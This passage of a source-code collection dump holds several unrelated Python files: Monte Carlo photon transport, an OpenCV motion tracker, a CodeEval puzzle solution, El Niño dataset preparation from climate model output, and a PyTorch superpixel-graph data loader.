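assert abs(steps.mean() - 1.0 / (mua + mus)) < 2e-3   # mean free path

w = 1.0
w_new = w * mus / (mua + mus)           # weight surviving one interaction
absorbed = w - w_new
assert np.isclose(absorbed, w * mua / (mua + mus))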
for total internal reflection\n if tissue1.n > tissue2.n and ai > np.arcsin(tissue2.n/tissue1.n):\n Ri = 1 # internal reflection\n elif tissue1.n == tissue2.n: # matched reflection index\n Ri = 0 # transmit with same direction\n else:\n at = np.arcsin(tissue1.n/tissue2.n * np.sin(ai)) # Snell law, transmission angle\n Ri = 0.5*( np.sin(ai-at)**2/np.sin(ai+at)**2 + np.tan(ai-at)**2/np.tan(ai+at)**2 ) \n # Randomly determine if reflect or transmit\n norm = top_layer.normal(self) # assume the photon is on the boundary\n if np.random.rand() < Ri: # reflect\n new_dir = -2*norm * self.direction.copy() + self.direction.copy()\n mode = 'reflect'\n else: # transmit\n k = np.sqrt(1 - tissue1.n**2/tissue2.n**2 * (1 - np.cos(ai)**2)) - tissue1.n/tissue2.n * np.cos(ai)\n if k is None:\n print('k is None') # debug\n if norm is None:\n print('norm is None') # debug\n if self.direction is None:\n print('dir is None') # DEBUG\n \n if tissue1.n <= tissue2.n:\n new_dir = k*norm + self.direction * tissue1.n/tissue2.n\n else:\n new_dir = -k*norm + self.direction * tissue1.n/tissue2.n\n # new_dir = k*norm + self.direction * tissue1.n/tissue2.n\n mode = 'transmit'\n \n # new_dir = self.direction # DEBUG\n # mode = 'transmit' # DEBUG \n self.direction = new_dir\n return mode\n \n def roulette(self, r=10):\n \"\"\"\n Randomly terminate photons if weigth is small enough or pathlength is long enough.\n\n Parameters\n ---------- \n r : INT\n The photon have 1/r chance to survive the roulette. If it survives,\n the weigth is increased r times.\n\n Returns\n -------\n None.\n \"\"\"\n RNG = np.random.randint(1, r+1)\n if RNG == r: # the photon survives\n self.weigth *= r\n else: # the photon is terminated\n self.weigth = 0 # maybe it is not necessary \n self.dead = True\n return\n \n def find_layer(self, tissues):\n \"\"\"\n Find the index of the current layer.\n \n Parameters\n ----------\n tissues : LIST of LAYER objects\n An ordered list that contains the geometry\n\n Returns\n -------\n idx : INT\n index of the current layer\n \"\"\"\n for idx, tissue in enumerate(tissues):\n if tissue.is_inside(self.coordinates):\n return idx # should stop at the first true value","repo_name":"nikelui/MCpython","sub_path":"MCphoton.py","file_name":"MCphoton.py","file_ext":"py","file_size_in_byte":7932,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"32238150373","text":"import cv2\nimport numpy as np\n\nbs = cv2.createBackgroundSubtractorKNN(detectShadows = True)\ncamera = cv2.VideoCapture(\"movie.mpg\")\n\nwhile True:\n ret, frame = camera.read()\n fgmask = bs.apply(frame)\n th = cv2.threshold(fgmask.copy(), 244, 255, cv2.THRESH_BINARY)[1]\n th = cv2.erode(th, cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3,3)), iterations = 2)\n dilated = cv2.dilate(th, cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (8,3)), iterations = 2)\n image, contours, hier = cv2.findContours(dilated, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n for c in contours:\n if cv2.contourArea(c) > 1000:\n (x,y,w,h) = cv2.boundingRect(c)\n cv2.rectangle(frame, (x,y), (x+w, y+h), (255, 255, 0), 2)\n\n cv2.imshow(\"mog\", fgmask)\n cv2.imshow(\"thresh\", th)\n cv2.imshow(\"diff\", frame & cv2.cvtColor(fgmask, cv2.COLOR_GRAY2BGR))\n cv2.imshow(\"detection\", frame)\n k = cv2.waitKey(30) & 0xff\n if k == 27:\n 
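# Illustrative check, not part of the original MCphoton.py: roulette()
# above keeps a photon with probability 1/r (randint(1, r+1) == r) and
# multiplies the survivor's weight by r, so the expected weight is
# conserved: E[w'] = (1/r)*r*w + (1 - 1/r)*0 = w. A quick numerical check:
import numpy as np

rng = np.random.default_rng(1)
r, w, n = 10, 0.01, 200_000
survived = rng.integers(1, r + 1, size=n) == r
mean_weight = np.where(survived, w * r, 0.0).mean()
assert abs(mean_weight - w) < 1e-3   # unbiased on average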
break\n\ncamera.release()\ncv2.destroyAllWindows()\n","repo_name":"Ewenwan/MVision","sub_path":"opencv_app/python/object_tracker/mog.py","file_name":"mog.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":7392,"dataset":"github-code","pt":"54"} +{"seq_id":"9808755525","text":"import sys\n\ninput = open(sys.argv[1], 'r')\n\nlines = []\nm = []\n\nfor l in input:\n line = l.split(' ')\n m.append(int(line[-1]))\n lines.append(line[:-1])\n\ninput.close()\n\nfor i in xrange(len(lines)):\n if m[i] > len(lines[i]):\n continue\n sys.stdout.write(lines[i][-m[i]])\n if i != len(lines)-1:\n sys.stdout.write('\\n')\n","repo_name":"michaelrbock/codeeval","sub_path":"moderate/mth_to_last_element.py","file_name":"mth_to_last_element.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"35446776933","text":"import matplotlib.pyplot as plt\nimport torch as th\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torchvision\nimport xarray as xr\nimport numpy as np\nimport nc_time_axis\nimport sys\nimport time\nimport random\nimport statistics\nimport preproc\nfrom torch.utils.data import Dataset, DataLoader\nfrom einops.layers.torch import Reduce\nfrom preproc import Normalizer\nfrom collections import Counter\n\n# For faster computation if CUDA is available\ndevice = 'cuda' if th.cuda.is_available() else 'cpu'\n\n# for saving plots and models\ntau_to_use = 3\ntime_of_script_runs = 0\n\n# current model being used (either with or without dropout layer)\n# current_adam_model = \"drop\"\ncurrent_adam_model = \"nodrop\"\n\n\n# ----------------------------------------------------------------------\n# CODE FOR DATASET\n\n# preprocessing, generating dataset to be used for DataLoaders\nclass ElNinoData(Dataset):\n def __init__(self, file, var_label='ts', lat_range: tuple = (-90, 90), lon_range: tuple = (-180, 180),\n tau: int = 1):\n '''\n file: path to netcdf file\n var_label: variable label in netcdf file\n lat_range: latitude range for data\n lon_range: longitude range for data\n tau: number of time steps to predict\n '''\n # open dataset\n self.ds = xr.open_dataset(file)[var_label]\n\n # ----------------------------------------------\n # SHOW WHOLE WORLD AS SST + MASKED\n # rand_picked_time = random.randint(0, 14399)\n # world_plot = self.ds.isel(time=7862)\n # print(world_plot)\n # ax = plt.axes()\n # world_plot.plot(cmap=\"coolwarm\")\n # ax.set_title('')\n # plt.show()\n #\n # f_lsm = \"./data/sftlf_fx_CESM2_historical_r1i1p1f1.nc\"\n # # Get lsm for loss masking of big cutout\n # land_area_mask = preproc.process_data(\n # f_lsm, ['sftlf'],\n # lon_range=(-180, 179),\n # lat_range=(-90, 90),\n # climatology=None,\n # shortest=False,\n # )['sftlf']\n # print(land_area_mask)\n # lsm = th.from_numpy(land_area_mask.where(land_area_mask == 0, 1).data)\n # # set mask for big cutout\n # world_masked = world_plot.where(lsm == 0.0)\n # ax = plt.axes()\n # world_masked.plot(cmap=\"coolwarm\")\n # ax.set_title('')\n # plt.show()\n #\n #\n # # NINO 3.4 CUTOUT ANOMALY\n # small_nino34_cutout = self.ds.sel(time=slice(\"0641-01-15\", \"0670-12-15\"), lat=slice(-5, 5), lon=slice(-170, -120))\n # small_nino34_cutout = small_nino34_cutout.groupby('time.month') - small_nino34_cutout.groupby('time.month').mean(dim=\"time\")\n # small_nino34_cutout = small_nino34_cutout.sel(time=\"0656-03-15\")\n # small_nino34_cutout = 
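# Illustrative sketch, not part of the original file: mth_to_last_element.py
# above is Python 2 only, since xrange() was removed in Python 3. A Python 3
# rendering of the same CodeEval solution (each input line holds
# space-separated tokens ending in m; print the m-th token from the end
# when it exists):
import sys

def mth_to_last(path: str) -> None:
    out = []
    with open(path) as fh:
        for raw in fh:
            tokens = raw.split()
            m = int(tokens[-1])
            elems = tokens[:-1]
            if m <= len(elems):
                out.append(elems[-m])
    print('\n'.join(out))

if __name__ == '__main__':
    mth_to_last(sys.argv[1])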
th.tensor(small_nino34_cutout.data, dtype=th.float32)\n # fig = plt.figure()\n # plt.pcolor(small_nino34_cutout.squeeze(), cmap=\"coolwarm\", vmin=-2, vmax=2)\n # plt.colorbar()\n # plt.show()\n #\n #\n # # BIG CUTOUT ANOMALY + MASKED\n # big_nino34_cutout = self.ds.sel(\n # lon=self.ds.lon[(self.ds.lon < min(lon_range)) |\n # (self.ds.lon > max(lon_range))],\n # lat=slice(np.min(lat_range), np.max(lat_range)))\n # big_nino34_cutout = big_nino34_cutout.roll(lon=39, roll_coords=True)\n # land_area_mask = preproc.process_data(\n # f_lsm, ['sftlf'],\n # lon_range=lon_range,\n # lat_range=lat_range,\n # climatology=None,\n # shortest=True,\n # )['sftlf']\n # land_area_mask = land_area_mask.roll(lon=39, roll_coords=True)\n # lsm = th.from_numpy(land_area_mask.where(land_area_mask == 0, 1).data)\n # big_nino34_cutout_masked = big_nino34_cutout.where(lsm == 0.0)\n #\n # big_nino34_cutout_masked = big_nino34_cutout_masked.sel(time=slice(\"0641-01-15\", \"0670-12-15\"))\n # big_nino34_cutout_masked = big_nino34_cutout_masked.groupby(\"time.month\") - big_nino34_cutout_masked.groupby('time.month').mean(dim=\"time\")\n # big_nino34_cutout_masked = big_nino34_cutout_masked.sel(time=\"0656-03-15\")\n # big_nino34_cutout = big_nino34_cutout.sel(time = slice(\"0641-01-15\", \"0670-12-15\"))\n # big_nino34_cutout = big_nino34_cutout.groupby(\"time.month\") - big_nino34_cutout.groupby('time.month').mean(dim=\"time\")\n # big_nino34_cutout = big_nino34_cutout.sel(time=\"0656-03-15\")\n # big_nino34_cutout = th.tensor(big_nino34_cutout.data, dtype=th.float32)\n # fig = plt.figure()\n # plt.pcolor(big_nino34_cutout.squeeze(), cmap=\"coolwarm\", vmin=-2, vmax=2)\n # plt.colorbar()\n # plt.show()\n # big_nino34_cutout_masked = th.tensor(big_nino34_cutout_masked.data, dtype=th.float32)\n # fig = plt.figure()\n # plt.pcolor(big_nino34_cutout_masked.squeeze(), cmap=\"coolwarm\", vmin=-2, vmax=2)\n # plt.colorbar()\n # plt.show()\n #\n # # nino34 cutout\n # self.ds_nino34 = self.ds.sel(lat=slice(-5, 5), lon=slice(-170, -120))\n #\n # # normalize nino 34\n # self.normalizer = Normalizer(method='zscore')\n # self.ds_nino34 = self.normalizer.fit_transform(self.ds_nino34)\n # self.ds_nino34.attrs = {'normalizer': self.normalizer}\n # small_nino34_cutout = self.ds_nino34.isel(time=7862)\n # small_nino34_cutout = th.tensor(small_nino34_cutout.data, dtype=th.float32)\n # fig = plt.figure()\n # plt.pcolor(small_nino34_cutout.squeeze(), cmap=\"coolwarm\")\n # plt.axis('off')\n # plt.show()\n #\n #\n # sys.exit()\n # ----------------------------------------------\n\n startingclock = time.time()\n climatology = self.ds.groupby('time.month').mean(dim='time')\n anomstart = self.ds.groupby('time.month') - climatology\n\n tsa_nino34 = anomstart.sel(lat=slice(-5, 5), lon=slice(-170, -120))\n nino34_index = tsa_nino34.mean(dim=['lat', 'lon'])\n nino34_index = nino34_index.rolling(time=5, center=True, min_periods=1).mean()\n print(f'Time it took to compute anomalies and nino 3.4 index : {time.time() - startingclock}')\n\n idx_lanina = np.where(nino34_index.data <= -0.5)[0]\n idx_elnino = np.where(nino34_index.data >= 0.5)[0]\n idx_neutral = np.where((nino34_index.data > -0.5) & (nino34_index.data < 0.5))[0]\n\n print('All Labeled Data Events within Dataset :')\n print(f'La Nina Events : [{len(idx_lanina)}/14400]{100. * len(idx_lanina) / 14400}')\n print(f'Neutral Events : [{len(idx_neutral)}/14400]{100. * len(idx_neutral) / 14400}')\n print(f'El Nino Events : [{len(idx_elnino)}/14400]{100. 
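# Illustrative sketch, not part of the original file: the live code above
# is the standard Nino 3.4 recipe, monthly climatology, anomalies, area
# mean over 5S-5N / 170W-120W, 5-month centred running mean, then +/-0.5
# thresholds. (Note the two labelling passes in this file disagree at the
# boundary: here >= 0.5 / <= -0.5, in _label_data strictly > 0.5 / < -0.5.)
# A condensed version, assuming a DataArray `ts` with time/lat/lon dims
# like the one loaded above:
import numpy as np

def nino34_index(ts):
    anom = ts.groupby('time.month') - ts.groupby('time.month').mean('time')
    box = anom.sel(lat=slice(-5, 5), lon=slice(-170, -120))
    idx = box.mean(['lat', 'lon']).rolling(time=5, center=True,
                                           min_periods=1).mean()
    labels = np.where(idx >= 0.5, 2, np.where(idx <= -0.5, 0, 1))
    return idx, labels    # 2 = El Nino, 1 = neutral, 0 = La Nina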
* len(idx_elnino) / 14400}\\n')\n\n lanina_mean = anomstart.isel(time=idx_lanina).mean(dim='time')\n neutral_mean = anomstart.isel(time=idx_neutral).mean(dim='time')\n elnino_mean = anomstart.isel(time=idx_elnino).mean(dim='time')\n lanina_mean34 = tsa_nino34.isel(time=idx_lanina).mean(dim='time')\n neutral_mean34 = tsa_nino34.isel(time=idx_neutral).mean(dim='time')\n elnino_mean34 = tsa_nino34.isel(time=idx_elnino).mean(dim='time')\n\n fig = plt.figure(figsize=(14, 10))\n lanina_mean.plot(cmap='coolwarm')\n fig.suptitle(\"Mean of all categorized La Niña events\")\n plt.show()\n\n fig = plt.figure(figsize=(14, 10))\n neutral_mean.plot(cmap='coolwarm')\n fig.suptitle(\"Mean of all categorized Neutral events\")\n plt.show()\n\n fig = plt.figure(figsize=(14, 10))\n elnino_mean.plot(cmap='coolwarm')\n fig.suptitle(\"Mean of all categorized El Niño events\")\n plt.show()\n\n fig = plt.figure(figsize=(14, 10))\n lanina_mean34.plot(cmap='coolwarm')\n fig.suptitle(\"Mean of all categorized La Niña events\")\n plt.show()\n\n fig = plt.figure(figsize=(14, 10))\n neutral_mean34.plot(cmap='coolwarm')\n fig.suptitle(\"Mean of all categorized Neutral events\")\n plt.show()\n\n fig = plt.figure(figsize=(14, 10))\n elnino_mean34.plot(cmap='coolwarm')\n fig.suptitle(\"Mean of all categorized El Niño events\")\n plt.show()\n\n\n # tsa_bigcutout = anomstart.sel(\n # lon=anomstart.lon[(anomstart.lon < min(lon_range)) |\n # (anomstart.lon > max(lon_range))],\n # lat=slice(np.min(lat_range), np.max(lat_range)))\n # tsa_bigcutout = tsa_bigcutout.roll(lon=39, roll_coords=True)\n # print(tsa_bigcutout)\n #\n # lanina_mean_big = th.tensor(tsa_bigcutout.isel(time=idx_lanina).mean(dim='time').data, dtype=th.float32)\n # neutral_mean_big = th.tensor(tsa_bigcutout.isel(time=idx_neutral).mean(dim='time').data, dtype=th.float32)\n # elnino_mean_big = th.tensor(tsa_bigcutout.isel(time=idx_elnino).mean(dim='time').data, dtype=th.float32)\n\n # fig = plt.figure(figsize=(14, 10))\n # plt.pcolor(lanina_mean_big, cmap='coolwarm')\n # fig.suptitle(\"Mean of all categorized La Niña events\")\n # plt.savefig(f\"./plots_and_whatnots/lanina_plot{time_of_script_runs+2}.png\")\n #\n # fig = plt.figure(figsize=(14, 10))\n # neutral_mean_big.plot(cmap='coolwarm')\n # fig.suptitle(\"Mean of all categorized Neutral events\")\n # plt.savefig(f\"./plots_and_whatnots/neutral_plot{time_of_script_runs+2}.png\")\n #\n # fig = plt.figure(figsize=(14, 10))\n # elnino_mean_big.plot(cmap='coolwarm')\n # fig.suptitle(\"Mean of all categorized El Niño events\")\n # plt.savefig(f\"./plots_and_whatnots/elnino_plot{time_of_script_runs+2}.png\")\n sys.exit()\n\n\n # select cutouts\n # big cutout -31,32 130,-70\n self.ds_big = self.ds.sel(\n lon=self.ds.lon[(self.ds.lon < min(lon_range)) |\n (self.ds.lon > max(lon_range))],\n lat=slice(np.min(lat_range), np.max(lat_range)))\n # orders big cutout for easier plots\n self.ds_big = self.ds_big.roll(lon=39, roll_coords=True)\n\n # nino34 cutout\n self.ds_nino34 = self.ds.sel(lat=slice(-5, 5), lon=slice(-170, -120))\n\n\n # normalize nino 34\n startingclock = time.time()\n self.normalizer = Normalizer(method='zscore')\n self.ds_nino34 = self.normalizer.fit_transform(self.ds_nino34)\n self.ds_nino34.attrs = {'normalizer': self.normalizer}\n\n # normalize big cutout\n self.ds_big = self.normalizer.fit_transform(self.ds_big)\n self.ds_big.attrs = {'normalizer': self.normalizer}\n print(f'Time it took only to normalize cutouts : {time.time() - startingclock}')\n\n\n # MASKING\n f_lsm = 
\"./data/sftlf_fx_CESM2_historical_r1i1p1f1.nc\"\n # Get lsm for loss masking of big cutout\n land_area_mask = preproc.process_data(\n f_lsm, ['sftlf'],\n lon_range=lon_range,\n lat_range=lat_range,\n climatology=None,\n )['sftlf']\n land_area_mask = land_area_mask.roll(lon=39, roll_coords=True)\n lsm = th.from_numpy(land_area_mask.where(land_area_mask == 0, 1).data)\n # set mask for big cutout\n self.ds_big_masked = self.ds_big.where(lsm == 0.0)\n self._plot_mean(self.ds_big_masked, labels_list)\n #self._plot_mean(self.ds_nino34, labels_list)\n\n\n self.data = th.tensor(self.ds_big_masked.data, dtype=th.float32)\n # plot first twelve months\n fig, axs = plt.subplots(nrows=4, ncols=3, sharex=True, sharey=True)\n fig.suptitle(\"First twelve months, their classes and nino 3.4 index values\")\n counter = 0\n for i in range(0, 4):\n for j in range(0, 3):\n temp_plot = axs[i, j].pcolor(self.data[counter], cmap=\"coolwarm\", vmin=-2, vmax=2)\n fig.colorbar(temp_plot, ax=axs[i, j])\n if labels_list[counter] == 2:\n axs[i, j].set_title(\"El Nino, {:.2f}\".format(nino34_index[counter]))\n elif labels_list[counter] == 1:\n axs[i, j].set_title(\"Neutral, {:.2f}\".format(nino34_index[counter]))\n elif labels_list[counter] == 0:\n axs[i, j].set_title(\"La Nina, {:.2f}\".format(nino34_index[counter]))\n counter += 1\n plt.tight_layout()\n #plt.show()\n\n\n self.data = th.tensor(self.ds_nino34.data, dtype=th.float32)\n # plot first twelve months\n fig, axs = plt.subplots(nrows=4, ncols=3, sharex=True, sharey=True)\n fig.suptitle(\"First twelve months, their classes and nino 3.4 index values\")\n counter = 0\n for i in range(0, 4):\n for j in range(0, 3):\n temp_plot = axs[i, j].pcolor(self.data[counter], cmap=\"coolwarm\", vmin=-2, vmax=2)\n fig.colorbar(temp_plot, ax=axs[i, j])\n if labels_list[counter] == 2:\n axs[i, j].set_title(\"El Nino, {:.2f}\".format(nino34_index[counter]))\n elif labels_list[counter] == 1:\n axs[i, j].set_title(\"Neutral, {:.2f}\".format(nino34_index[counter]))\n elif labels_list[counter] == 0:\n axs[i, j].set_title(\"La Nina, {:.2f}\".format(nino34_index[counter]))\n counter += 1\n plt.tight_layout()\n #plt.show()\n\n # function that calculates mean and anomalies of given darray\n def _compute_anomalies_nino34(self, darray):\n\n # list of all computed nino34 years and months\n labels_list = []\n\n # first and last year of dataset\n time_start_year = darray['time'].data.min().year\n time_end_year = darray['time'].data.max().year\n time_step_size = 1\n\n # iterate over all years\n for x in range(time_start_year, time_end_year + (time_step_size * 2), time_step_size):\n\n # Code to fill the string to the 0001-1200 year format\n time_start = str(x)\n start_len = len(time_start)\n time_end = str(x + 30)\n end_len = len(time_end)\n\n if start_len < 4:\n while (start_len < 4):\n time_start = \"0\" + time_start\n start_len = len(time_start)\n\n if end_len < 4:\n while (end_len < 4):\n time_end = \"0\" + time_end\n end_len = len(time_end)\n\n # edge case so it doesn't do the last 30 years in smaller increments\n if int(time_end) == 1201:\n time_start = time_start + \"-01-15\"\n time_end = \"1201-01-05\"\n else:\n time_start = time_start + \"-01-15\"\n time_end = time_end + \"-01-05\"\n\n timeslice_30y = darray.sel(time=slice(time_start, time_end))\n\n\n climatology = timeslice_30y.groupby('time.month').mean(dim='time')\n anom = timeslice_30y.groupby('time.month') - climatology\n\n # edge case so it doesn't do the last 30 years in smaller increments\n if time_end == \"1201-01-05\":\n for 
i in range(0, len(anom.data)):\n                    labels_list.append(anom.data[i])\n                break\n\n            sliced_data = anom.data[0:12]\n            for i in range(0, len(sliced_data)):\n                labels_list.append(sliced_data[i])\n\n        return labels_list\n\n    # function that categorizes the given anomalies according to the Nino 3.4 Index standard\n    def _label_data(self, darray, anomalies):\n\n        elnino_class_counter = 0\n        neutral_class_counter = 0\n        lanina_class_counter = 0\n\n        # list of all labeled nino34 events within time span (1200 years)\n        labels_list = []\n\n        # categorize anomalies as El Nino (2), Neutral (1) or La Nina (0)\n        for i in anomalies:\n            if i > 0.5:\n                labels_list.append(2)\n                elnino_class_counter += 1\n            elif i < -0.5:\n                labels_list.append(0)\n                lanina_class_counter += 1\n            else:\n                labels_list.append(1)\n                neutral_class_counter += 1\n        print('All Labeled Data Events within Dataset :')\n        print(f'La Nina Events : [{lanina_class_counter}/14400]{100. * lanina_class_counter / 14400}')\n        print(f'Neutral Events : [{neutral_class_counter}/14400]{100. * neutral_class_counter / 14400}')\n        print(f'El Nino Events : [{elnino_class_counter}/14400]{100. * elnino_class_counter / 14400}\\n')\n        return labels_list\n\n    def _plot_mean(self, darray, labels_list):\n\n        # get index of all elnino events\n        elnino_indices = [i for i, x in enumerate(labels_list) if x == 2]\n        # get index of all neutral events\n        neutral_indices = [i for i, x in enumerate(labels_list) if x == 1]\n        # get index of all lanina events\n        lanina_indices = [i for i, x in enumerate(labels_list) if x == 0]\n\n        # plot elnino mean\n        ind_elnino = xr.DataArray(elnino_indices, dims=[\"time\"])\n        elnino_da = darray[ind_elnino]\n        elnino_da = elnino_da.mean(dim=\"time\")\n        elnino_tensor = th.tensor(elnino_da.data, dtype=th.float32)\n        fig = plt.figure(figsize=(14, 10))\n        fig.suptitle(\"The mean of all labeled El Nino Events\")\n        plt.pcolor(elnino_tensor, cmap=\"coolwarm\", vmin=-2, vmax=2)\n        plt.colorbar()\n        plt.show()\n\n        # plot neutral mean\n        ind_neutral = xr.DataArray(neutral_indices, dims=[\"time\"])\n        neutral_da = darray[ind_neutral]\n        neutral_da = neutral_da.mean(dim=\"time\")\n        neutral_tensor = th.tensor(neutral_da.data, dtype=th.float32)\n        fig = plt.figure(figsize=(14, 10))\n        fig.suptitle(\"The mean of all labeled Neutral Events\")\n        plt.pcolor(neutral_tensor, cmap=\"coolwarm\", vmin=-2, vmax=2)\n        plt.colorbar()\n        plt.show()\n\n        # plot lanina mean\n        ind_lanina = xr.DataArray(lanina_indices, dims=[\"time\"])\n        lanina_da = darray[ind_lanina]\n        lanina_da = lanina_da.mean(dim=\"time\")\n        lanina_tensor = th.tensor(lanina_da.data, dtype=th.float32)\n        fig = plt.figure(figsize=(14, 10))\n        fig.suptitle(\"The mean of all labeled La Nina Events\")\n        plt.pcolor(lanina_tensor, cmap=\"coolwarm\", vmin=-2, vmax=2)\n        plt.colorbar()\n        plt.show()\n\n    def __len__(self):\n        return self.data.shape[1] - 1\n\n    def __getitem__(self, idx):\n        if idx + self.tau > (self.data.shape[1] - 1):\n            return self.data[:, idx], self.nino_label_list[(self.data.shape[1] - 1)]\n        return self.data[:, idx], self.nino_label_list[idx + self.tau]\n\n\n# INPUTS FOR DATASET: FILEPATH, VAR_LABEL OF FILE, LAT OF CUTOUT, LON OF CUTOUT, MONTHS TO PREDICT#\nstart_time = time.time()\nfilename = \"./data/ts_Amon_CESM2_piControl_r1i1p1f1.nc\"\nnino34_dataset = ElNinoData(filename, 'ts', (-31, 32), (130, -70), tau_to_use)\n# nino34_dataset = ElNinoData(\"./data/ts_Amon_CESM2_piControl_r1i1p1f1.nc\", 'ts', (-5, 5), (-170, -120), tau_to_use)\nend_time = time.time()\nprint(f'Time it took to prepare dataset : {end_time - 
start_time}')\nsys.exit()\n","repo_name":"MTRucker/AdversaryDLWPModels","sub_path":"remnants/fixed_ninodataset.py","file_name":"fixed_ninodataset.py","file_ext":"py","file_size_in_byte":19127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21966156786","text":"import os\n\nfrom torch.utils.data import Dataset\nimport subprocess\n\nfrom src.data_handling.DatasetHandler import Splits, SupportedDatasets, get_dataset_dir, is_preprocessed_data_available, make_dataset_available_for_preprocessing\nimport numpy as np\nimport torch\nfrom src.data_handling.GraphData import GraphData\nfrom torch import Tensor\nfrom typing import Dict\nfrom torch_sparse import SparseTensor\nimport psutil\n\n# NOTE: the code below is all vectorised for efficiency and caching of arbitrary transformations is done for efficiency as well\n# so variable names and the operations involved might not be very readable, but the complexity is needed solely for efficiency\n# and the fact that we are constructing and normalising and batching the input for all image graphs at the same time\n\n# generates a tensor that can index a tensor starting from offsets and going up to length\n# used for doing a vectorised select of multiple parts of the image graphs (such as the contour data)\n# Example: offsets: [1,6], lengths: [2,4]\n# Returned: [1,2,6,7,8,9]\ndef get_consecutive_idxs(offsets: Tensor, lengths: Tensor):\n lengths_no_last = lengths[:-1]\n cumsum_query_lengths = torch.cumsum(lengths_no_last,0)\n lengths_total = cumsum_query_lengths[-1]+lengths[-1]\n basis = torch.repeat_interleave(offsets-1,lengths, output_size = lengths_total)\n counting = torch.ones(lengths_total,dtype=torch.long)\n counting[cumsum_query_lengths]=-lengths_no_last+1\n final_idxs=basis+torch.cumsum(counting,0)\n return final_idxs\n\ndef get_data(given_idxs: Tensor, offsets: Tensor, lengths: Tensor, statistics: Tensor, data: Tensor, graph_params: Dict[str, bool]):\n\n idxs=torch.sort(given_idxs)[0]\n query_offsets=torch.index_select(offsets,0,idxs)\n query_lengths = torch.index_select(lengths,0,idxs)\n # all the data for the image graphs corresponding to the given indices\n all_data = torch.index_select(data,0,get_consecutive_idxs(query_offsets, query_lengths))\n \n\n input_idxs_length = idxs.shape[0]\n new_offsets = torch.cat((torch.tensor([0]),torch.cumsum(query_lengths[:-1],0)))\n # getting the data statistics that will inform further fetching and batching\n general_stats = torch.index_select(all_data,0,get_consecutive_idxs(new_offsets, torch.full(idxs.shape,6))).to(torch.long).view(input_idxs_length,6)\n y = general_stats[:,0].contiguous()\n nr_superpixels = general_stats[:,1].contiguous()\n num_edges = general_stats[:,2].contiguous()\n img_height = general_stats[:,3].contiguous()\n img_width = general_stats[:,4].contiguous()\n all_contours_size = general_stats[:,5].contiguous()\n\n double_num_edges = 2*num_edges\n\n node_features_length_addition = 7*nr_superpixels\n shape_length_offset = 6+new_offsets\n biggest_distance_shape_idx_offset = shape_length_offset+nr_superpixels\n node_features_offset = biggest_distance_shape_idx_offset+nr_superpixels\n edges_first_offset = node_features_offset+node_features_length_addition\n edges_second_offset = edges_first_offset+double_num_edges\n\n \n # get the actual data as well\n shape_lengths = torch.index_select(all_data,0,get_consecutive_idxs(shape_length_offset, nr_superpixels)).to(torch.long)\n x = 
torch.index_select(all_data,0,get_consecutive_idxs(node_features_offset, node_features_length_addition))\n x = x.view(x.shape[0]//7,7)\n used_statistics = statistics.view(statistics.shape[0]//2,2)[[0,1,2,3,4,5,6],:]\n # select superpixel features based on given options\n if not graph_params['use_stddev'] and graph_params['no_size']:\n x = x[:,[1,2,3]]\n used_statistics = used_statistics[[1,2,3],:]\n elif graph_params['use_stddev'] and graph_params['no_size']:\n x = x[:,[1,2,3,4,5,6]]\n used_statistics = used_statistics[[1,2,3,4,5,6],:]\n elif not graph_params['use_stddev'] and not graph_params['no_size']:\n x = x[:,[0,1,2,3]]\n used_statistics = used_statistics[[0,1,2,3],:]\n\n # create the edges in the way desired by the Pytorch Geometric batching\n actual_cumsum_nr_superpixels = torch.cumsum(nr_superpixels,0)\n nr_superpixels_size = actual_cumsum_nr_superpixels[-1]\n inc_edge_index = torch.repeat_interleave(torch.cat((torch.tensor([0]),actual_cumsum_nr_superpixels[:-1])), double_num_edges)\n edge_index_first = torch.index_select(all_data,0,get_consecutive_idxs(edges_first_offset, double_num_edges)).to(torch.long)+inc_edge_index\n edge_index_second = torch.index_select(all_data,0,get_consecutive_idxs(edges_second_offset, double_num_edges)).to(torch.long)+inc_edge_index\n \n\n shapes = torch.index_select(all_data,0,get_consecutive_idxs(edges_second_offset+double_num_edges, all_contours_size*2+nr_superpixels*2))\n actual_cumsum_shape_lengths = torch.cumsum(shape_lengths,0)\n cumsum_shape_lengths = torch.cat((torch.tensor([0]),actual_cumsum_shape_lengths[:-1]))\n double_cumsum_shape_lengths = cumsum_shape_lengths*2\n shape_lengths_shape = shape_lengths.shape[0]\n arange_shape_lengths = torch.arange(shape_lengths_shape)\n\n centroids = torch.index_select(shapes,0,get_consecutive_idxs(double_cumsum_shape_lengths+2*(arange_shape_lengths+shape_lengths), torch.full(double_cumsum_shape_lengths.shape, 2)))\n # create the batch in the way desired by the Pytorch Geometric batching\n batch = torch.repeat_interleave(torch.arange(input_idxs_length),nr_superpixels, output_size=nr_superpixels_size)\n centroids_euclid = centroids.view(shape_lengths_shape,2).contiguous()\n centroid_y = centroids_euclid[:,0]\n centroid_x = centroids_euclid[:,1]\n pos = centroids_euclid\n edge_norm_used_pos = centroids_euclid\n # normalise/convert centroids according to the given options\n if graph_params['norm_centroids'] or graph_params['polar_centroids']:\n centroid_y_diff = centroid_y-torch.repeat_interleave((img_height-1)/2, nr_superpixels, output_size=nr_superpixels_size)\n centroid_x_diff = centroid_x-torch.repeat_interleave((img_width-1)/2, nr_superpixels, output_size=nr_superpixels_size)\n centroid_dist = torch.sqrt(centroid_y_diff**2+(centroid_x_diff)**2)\n centroid_angle = torch.atan2(centroid_y_diff, centroid_x_diff)\n if graph_params['norm_centroids']:\n centroid_dist/=torch.repeat_interleave(torch.sqrt(img_height*img_height+img_width*img_width), nr_superpixels, output_size=nr_superpixels_size)\n edge_norm_used_pos = torch.stack((centroid_dist*torch.sin(centroid_angle), centroid_dist*torch.cos(centroid_angle))).t().contiguous()\n if graph_params['polar_centroids']:\n pos = torch.stack((centroid_dist,(centroid_angle+torch.pi)/(torch.pi*2))).t().contiguous()\n else:\n pos = edge_norm_used_pos\n\n # compute edge weights\n if graph_params['use_edge_weights']:\n edge_attr = 